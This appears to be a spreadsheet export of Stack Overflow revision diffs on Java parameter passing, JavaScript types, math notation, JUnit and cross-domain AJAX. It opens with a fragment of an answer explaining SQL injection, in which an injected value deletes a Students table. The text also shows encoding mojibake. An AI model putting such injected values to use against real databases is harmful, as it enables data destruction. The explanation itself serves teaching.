  &lt;p&gt; Delete the Students table&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Everything past the second query is &lt;a href="http://msdn.microsoft.com/en-us/library/ms181627.aspx" rel="nofollow noreferrer"&gt;marked as a comment&lt;/a&gt;: &lt;code&gt;--'&lt;span class="diff-add"&gt;, 'Derper'&lt;/span&gt;)&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;'&lt;/code&gt; in the student's name is not a comment, it's the closing &lt;a href="http://msdn.microsoft.com/en-us/library/ms179899.aspx" rel="nofollow noreferrer"&gt;string delimiter&lt;/a&gt;. Since the student's name is a string, it's needed syntactically to complete the hypothetical query. Injection attacks only work &lt;em&gt;when the SQL query they inject results in good SQL&lt;/em&gt; (good being very relative in this case).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;sup&gt;&lt;sup&gt;Edited &lt;em&gt;&lt;strong&gt;again&lt;/strong&gt;&lt;/em&gt; as per &lt;a href="http://stackoverflow.com/users/287586/dan04"&gt;dan04&lt;/a&gt;'s astute comment&lt;/sup&gt;&lt;/sup&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ptharien's Flame</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; You can use&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;function getType( obj )_x000D_
{_x000D_
  return Object.prototype.toString.call(obj);_x000D_
}_x000D_
alert( getType( 'str' ) );     // [object String]_x000D_
alert( getType( 55 ) );        // [object Number]_x000D_
alert( getType( new Date() ) );// [object Date]_x000D_
alert( getType( null ) );      // [object Null]_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; Is there a JavaScript equivalent of Java's &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;class.getName()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;No&lt;/span&gt;&lt;/strong&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>bobobobo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I take your question to be about math notation rather than programming. The triple equal sign you refer to can be written &lt;code&gt;&amp;amp;equiv;&lt;/code&gt; in html or &lt;code&gt;\equiv&lt;/code&gt; in LaTeX.&lt;/p&gt; _x000D_
 &lt;p&gt; a â‰¡ b most commonly means "a is defined to be b" or "let a be equal to b".&lt;/p&gt; _x000D_
 &lt;p&gt; So 2+2=4 but Ï† â‰¡ (1+sqrt(5))/2.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a handy equivalence table:&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; Mathematicians&amp;nbsp; &amp;nbsp;Computer scientists&lt;/span&gt; _x000D_
 &lt;span class="diff-delete"&gt;= ==&lt;/span&gt; _x000D_
 &lt;span class="diff-delete"&gt;? = &lt;/span&gt; _x000D_
 &lt;p&gt;(The other answers about equivalence relations are correct too but I don't think those are as common. There's also a â‰¡ b (mod m) which is pronounced "a is congruent to b, mod m" and in programmer parlance would be expressed as mod(a,m) == mod(b,m). In other words, a and b are equal after mod'ing by m.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I take your question to be about math notation rather than programming. The triple equal sign you refer to can be written &lt;code&gt;&amp;amp;equiv;&lt;/code&gt; in html or &lt;code&gt;\equiv&lt;/code&gt; in LaTeX.&lt;/p&gt; _x000D_
 &lt;p&gt; a â‰¡ b most commonly means "a is defined to be b" or "let a be equal to b".&lt;/p&gt; _x000D_
 &lt;p&gt; So 2+2=4 but Ï† â‰¡ (1+sqrt(5))/2.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a handy equivalence table:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
Mathematicians      Computer scientists_x000D_
--------------      -------------------_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;h1&gt;&lt;span class="diff-add"&gt;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;= Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp; == &lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;span class="diff-add"&gt; Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;â‰¡ Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;Â&amp;nbsp;&lt;/span&gt;&lt;/h1&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;(The other answers about equivalence relations are correct too but I don't think those are as common. There's also a â‰¡ b (mod m) which is pronounced "a is congruent to b, mod m" and in programmer parlance would be expressed as mod(a,m) == mod(b,m). In other words, a and b are equal after mod'ing by m.)&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; PS: HTML rendering bug! The following table shows up nicely in the preview but doesn't render as a table after I submit it.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; Mathematicians&amp;nbsp; &amp;nbsp;Computer scientists = ==&lt;/span&gt; _x000D_
 &lt;span class="diff-add"&gt;? = &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Actually, in Java, the &lt;strong&gt;references are passed-by-value&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, the reference is a &lt;code&gt;byte[]&lt;/code&gt; object. Any changes that affect the object itself will be seen from the caller method.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if you try to replace the reference, for example using &lt;code&gt;new byte[length]&lt;/code&gt;, you are only replacing the reference that you obtained by pass-by-value, so you are not changing the reference in the caller method.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's an interesting read about this issue: &lt;a href="http://javadude.com/articles/passbyvalue.htm" rel="nofollow noreferrer"&gt;Java is Pass-by-Value Dammit!&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Here's an concrete example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class PassByValue&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
    public static void modifyArray(byte[] array) {_x000D_
        System.out.println("Method Entry:  Length: " + array.length);_x000D_
        array = new byte[16];_x000D_
        System.out.println("Method Exit:   Length: " + array.length);_x000D_
    }_x000D_
    _x000D_
    public static void main(String[] args) {_x000D_
        byte[] array = new byte[8];_x000D_
        System.out.println("Before Method: Length: " + array.length);_x000D_
        modifyArray(array);_x000D_
        System.out.println("After Method:  Length: " + array.length);_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This program will create a &lt;code&gt;byte&lt;/code&gt; array of length &lt;code&gt;8&lt;/code&gt; in the &lt;code&gt;main&lt;/code&gt; method, which will call the &lt;code&gt;modifyArray&lt;/code&gt; method, where the a new &lt;code&gt;byte&lt;/code&gt; array of length &lt;code&gt;16&lt;/code&gt; is created.&lt;/p&gt; _x000D_
 &lt;p&gt; It may appear that by creating a new &lt;code&gt;byte&lt;/code&gt; array in the &lt;code&gt;modifyArray&lt;/code&gt; method, that the length of the &lt;code&gt;byte&lt;/code&gt; array upon returning to the &lt;code&gt;main&lt;/code&gt; method will be &lt;code&gt;16&lt;/code&gt;, however, running this program reveals something different:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Before Method: Length: 8_x000D_
Method Entry:  Length: 8_x000D_
Method Exit:   Length: 16_x000D_
After Method:  Length: 8_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The length of the &lt;code&gt;byte&lt;/code&gt; array upon returning from the &lt;code&gt;modifyArray&lt;/code&gt; method reverts to &lt;code&gt;8&lt;/code&gt; instead of &lt;code&gt;16&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Why is that?&lt;/p&gt; _x000D_
 &lt;p&gt; That's because the &lt;code&gt;main&lt;/code&gt; method called the &lt;code&gt;modifyArray&lt;/code&gt; method and sent &lt;strong&gt;a copied reference to the &lt;code&gt;new byte[8]&lt;/code&gt;&lt;/strong&gt; by using &lt;strong&gt;pass-by-value&lt;/strong&gt;. Then, the &lt;code&gt;modifyArray&lt;/code&gt; method &lt;strong&gt;threw away the copied reference by creating a &lt;code&gt;new byte[16]&lt;/code&gt;&lt;/strong&gt;. By the time we leave &lt;code&gt;modifyArray&lt;/code&gt;, the reference to the &lt;code&gt;new byte[16]&lt;/code&gt; is out of scope (and eventually will be garbage collected.) However, the &lt;code&gt;main&lt;/code&gt; method still has reference to the &lt;code&gt;new byte[8]&lt;/code&gt; as it only &lt;strong&gt;sent the copied reference&lt;/strong&gt; and not an actual reference to the reference.&lt;/p&gt; _x000D_
 &lt;p&gt; That should demonstrate that Java will pass reference using pass-by-value.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Actually, in Java, the &lt;strong&gt;references are passed-by-value&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; In this case, the reference is a &lt;code&gt;byte[]&lt;/code&gt; object. Any changes that affect the object itself will be seen from the caller method.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if you try to replace the reference, for example using &lt;code&gt;new byte[length]&lt;/code&gt;, you are only replacing the reference that you obtained by pass-by-value, so you are not changing the reference in the caller method.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's an interesting read about this issue: &lt;a href="http://javadude.com/articles/passbyvalue.htm" rel="nofollow noreferrer"&gt;Java is Pass-by-Value Dammit!&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; Here's an concrete example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class PassByValue&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    public static void modifyArray(byte[] array)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        System.out.println("Method Entry:  Length: " + array.length);_x000D_
        array = new byte[16];_x000D_
        System.out.println("Method Exit:   Length: " + array.length);_x000D_
    }_x000D_
    _x000D_
    public static void main(String[] args)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        byte[] array = new byte[8];_x000D_
        System.out.println("Before Method: Length: " + array.length);_x000D_
        modifyArray(array);_x000D_
        System.out.println("After Method:  Length: " + array.length);_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This program will create a &lt;code&gt;byte&lt;/code&gt; array of length &lt;code&gt;8&lt;/code&gt; in the &lt;code&gt;main&lt;/code&gt; method, which will call the &lt;code&gt;modifyArray&lt;/code&gt; method, where the a new &lt;code&gt;byte&lt;/code&gt; array of length &lt;code&gt;16&lt;/code&gt; is created.&lt;/p&gt; _x000D_
 &lt;p&gt; It may appear that by creating a new &lt;code&gt;byte&lt;/code&gt; array in the &lt;code&gt;modifyArray&lt;/code&gt; method, that the length of the &lt;code&gt;byte&lt;/code&gt; array upon returning to the &lt;code&gt;main&lt;/code&gt; method will be &lt;code&gt;16&lt;/code&gt;, however, running this program reveals something different:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Before Method: Length: 8_x000D_
Method Entry:  Length: 8_x000D_
Method Exit:   Length: 16_x000D_
After Method:  Length: 8_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The length of the &lt;code&gt;byte&lt;/code&gt; array upon returning from the &lt;code&gt;modifyArray&lt;/code&gt; method reverts to &lt;code&gt;8&lt;/code&gt; instead of &lt;code&gt;16&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Why is that?&lt;/p&gt; _x000D_
 &lt;p&gt; That's because the &lt;code&gt;main&lt;/code&gt; method called the &lt;code&gt;modifyArray&lt;/code&gt; method and sent &lt;strong&gt;a copied reference to the &lt;code&gt;new byte[8]&lt;/code&gt;&lt;/strong&gt; by using &lt;strong&gt;pass-by-value&lt;/strong&gt;. Then, the &lt;code&gt;modifyArray&lt;/code&gt; method &lt;strong&gt;threw away the copied reference by creating a &lt;code&gt;new byte[16]&lt;/code&gt;&lt;/strong&gt;. By the time we leave &lt;code&gt;modifyArray&lt;/code&gt;, the reference to the &lt;code&gt;new byte[16]&lt;/code&gt; is out of scope (and eventually will be garbage collected.) However, the &lt;code&gt;main&lt;/code&gt; method still has reference to the &lt;code&gt;new byte[8]&lt;/code&gt; as it only &lt;strong&gt;sent the copied reference&lt;/strong&gt; and not an actual reference to the reference.&lt;/p&gt; _x000D_
 &lt;p&gt; That should demonstrate that Java will pass reference using pass-by-value.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>coobird</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are you doing in your method? If you're merely populating an existing array, then you don't need pass-by-reference semantics - either in .NET or in Java. In both cases, the reference will be passed by value - so changes to the &lt;em&gt;object&lt;/em&gt; will be visible by the caller. That's like telling someone the address of your house and asking them to deliver something to it - no problem.&lt;/p&gt; _x000D_
 &lt;p&gt; If you &lt;em&gt;really&lt;/em&gt; want pass-by-reference semantics, i.e. the caller will see any changes made to the parameter itself, e.g. setting it to null or a reference to a different byte array, then either method needs to return the new value, or you need to pass a reference to some sort of "holder" which contains a reference to the byte array, and which can have the (possibly changed) reference grabbed from it later.&lt;/p&gt; _x000D_
 &lt;p&gt; In other words, if your method looks likes this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void doSomething(byte[] data)&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
    for (int i=0; i &amp;lt; data.length; i++) {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; then you're fine. If your method looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void createArray(byte[] data, int length)&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
    // Eek! Change to parameter won't get seen by caller_x000D_
    data = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; data.length; i++) {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; then you need to change it to either:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public byte[] createArray(int length)&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
    byte[] data = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; data.length; i++) {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
    return data;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; or:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class Holder&amp;lt;T&amp;gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
    public T value; // Use a property in real code!_x000D_
}_x000D_
_x000D_
public void createArray(Holder&amp;lt;byte[]&amp;gt; holder, int length)&lt;span class="diff-delete"&gt;  &lt;/span&gt;{_x000D_
    holder.value = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; length; i++) {_x000D_
        holder.value[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For more details, read &lt;a href="http://pobox.com/%7Eskeet/csharp/parameters.html" rel="nofollow noreferrer"&gt;Parameter passing in C#&lt;/a&gt; and &lt;a href="http://pobox.com/%7Eskeet/java/parameters.html" rel="nofollow noreferrer"&gt;Parameter passing in Java&lt;/a&gt;. (The former is better written than the latter, I'm afraid. One day I'll get round to doing an update.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are you doing in your method? If you're merely populating an existing array, then you don't need pass-by-reference semantics - either in .NET or in Java. In both cases, the reference will be passed by value - so changes to the &lt;em&gt;object&lt;/em&gt; will be visible by the caller. That's like telling someone the address of your house and asking them to deliver something to it - no problem.&lt;/p&gt; _x000D_
 &lt;p&gt; If you &lt;em&gt;really&lt;/em&gt; want pass-by-reference semantics, i.e. the caller will see any changes made to the parameter itself, e.g. setting it to null or a reference to a different byte array, then either method needs to return the new value, or you need to pass a reference to some sort of "holder" which contains a reference to the byte array, and which can have the (possibly changed) reference grabbed from it later.&lt;/p&gt; _x000D_
 &lt;p&gt; In other words, if your method looks likes this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void doSomething(byte[] data)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    for (int i=0; i &amp;lt; data.length; i++)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; then you're fine. If your method looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public void createArray(byte[] data, int length)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    // Eek! Change to parameter won't get seen by caller_x000D_
    data = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; data.length; i++)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; then you need to change it to either:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public byte[] createArray(int length)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    byte[] data = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; data.length; i++)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        data[i] = (byte) i;_x000D_
    }_x000D_
    return data;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; or:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class Holder&amp;lt;T&amp;gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    public T value; // Use a property in real code!_x000D_
}_x000D_
_x000D_
public void createArray(Holder&amp;lt;byte[]&amp;gt; holder, int length)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
    holder.value = new byte[length]; _x000D_
    for (int i=0; i &amp;lt; length; i++)&lt;span class="diff-add"&gt;_x000D_
   &lt;/span&gt; {_x000D_
        holder.value[i] = (byte) i;_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For more details, read &lt;a href="http://pobox.com/%7Eskeet/csharp/parameters.html" rel="nofollow noreferrer"&gt;Parameter passing in C#&lt;/a&gt; and &lt;a href="http://pobox.com/%7Eskeet/java/parameters.html" rel="nofollow noreferrer"&gt;Parameter passing in Java&lt;/a&gt;. (The former is better written than the latter, I'm afraid. One day I'll get round to doing an update.)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Both &lt;code&gt;&lt;span class="diff-delete"&gt;Ant&lt;/span&gt;&lt;/code&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;Maven&lt;/span&gt;&lt;/code&gt; can run &lt;code&gt;&lt;span class="diff-delete"&gt;JUnit 4&lt;/span&gt;&lt;/code&gt; tests just fine. The only reasons to use JUnit 3 are legacy systems: Either you're force to use a Pre-Java 5 JDK or you have extensive tooling that depends on JUnit 3 and doesn't support JUnit 4.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Both &lt;span class="diff-add"&gt;JUnit&lt;/span&gt; and &lt;span class="diff-add"&gt;Maven&lt;/span&gt; can run &lt;span class="diff-add"&gt;JUnit 4&lt;/span&gt; tests just fine. The only reasons to use JUnit 3 are legacy systems: Either you're force to use a Pre-Java 5 JDK or you have extensive tooling that depends on JUnit 3 and doesn't support JUnit 4.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Joachim Sauer</t>
  </si>
  <si>
    <t>Sasikumar Murugesan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to make an AJAX request from a website to a REST web service hosted in another domain.&lt;br&gt;&lt;br&gt; Althouht this is works just fine in Internet Explorer, other browsers such as Mozilla and Google Chrome impose far stricter security restrictions, which prohibit cross-site AJAX requests.&lt;/p&gt; _x000D_
 &lt;p&gt; My problem is that I have no control over the domain nor the web server where the site is hosted. This means my REST web service must run somewhere else, and I can't put in place any redirection mechanism.&lt;br&gt;Here is the JavaScript code that makes the asynchronous call:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serviceUrl = &lt;span class="hljs-string"&gt;"http://myservicedomain"&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; payload = &lt;span class="hljs-string"&gt;"&amp;lt;myRequest&amp;gt;&amp;lt;content&amp;gt;Some content&amp;lt;/content&amp;gt;&amp;lt;/myRequest&amp;gt;"&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; request = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XMLHttpRequest();_x000D_
request.open(&lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;, serviceUrl, &lt;span class="hljs-literal"&gt;true&lt;/span&gt;); &lt;span class="hljs-comment"&gt;// &amp;lt;-- This fails in Mozilla Firefox amongst other browsers&lt;/span&gt;_x000D_
request.setRequestHeader(&lt;span class="hljs-string"&gt;"Content-type"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"text/xml"&lt;/span&gt;);_x000D_
request.send(payload);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; How can have this work in other browsers than just Internet Explorer?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Related question:&lt;/span&gt;&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/52646/best-practice-legitimate-cross-site-scripting" title="Best Practice: Legitimate Cross-Site Scripting"&gt;Best Practice: Legitimate Cross-Site Scripting&lt;/a&gt;, see the answers there.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to make an AJAX request from a website to a REST web service hosted in another domain.&lt;br&gt;&lt;br&gt; Althouht this is works just fine in Internet Explorer, other browsers such as Mozilla and Google Chrome impose far stricter security restrictions, which prohibit cross-site AJAX requests.&lt;/p&gt; _x000D_
 &lt;p&gt; My problem is that I have no control over the domain nor the web server where the site is hosted. This means my REST web service must run somewhere else, and I can't put in place any redirection mechanism.&lt;br&gt;Here is the JavaScript code that makes the asynchronous call:&lt;/p&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; serviceUrl = &lt;span class="hljs-string"&gt;"http://myservicedomain"&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; payload = &lt;span class="hljs-string"&gt;"&amp;lt;myRequest&amp;gt;&amp;lt;content&amp;gt;Some content&amp;lt;/content&amp;gt;&amp;lt;/myRequest&amp;gt;"&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; request = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; XMLHttpRequest();_x000D_
request.open(&lt;span class="hljs-string"&gt;"POST"&lt;/span&gt;, serviceUrl, &lt;span class="hljs-literal"&gt;true&lt;/span&gt;); &lt;span class="hljs-comment"&gt;// &amp;lt;-- This fails in Mozilla Firefox amongst other browsers&lt;/span&gt;_x000D_
request.setRequestHeader(&lt;span class="hljs-string"&gt;"Content-type"&lt;/span&gt;, &lt;span class="hljs-string"&gt;"text/xml"&lt;/span&gt;);_x000D_
request.send(payload);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; How can have this work in other browsers than just Internet Explorer?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Duplicate of&lt;/span&gt;&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/52646/best-practice-legitimate-cross-site-scripting" title="Best Practice: Legitimate Cross-Site Scripting"&gt;Best Practice: Legitimate Cross-Site Scripting&lt;/a&gt;, see the answers there.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Enrico Campidoglio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;go find a life dude. I cant teach you to eat food&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Ctrl + G&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Check out all the key board short cuts at :&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?familyid=e5f902a8-5bb5-4cc6-907e-472809749973&amp;amp;displaylang=en" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.microsoft.com/downloads/details.aspx?familyid=e5f902a8-5bb5-4cc6-907e-472809749973&amp;amp;displaylang=en&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>3Dave</t>
  </si>
  <si>
    <t>Samiksha</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
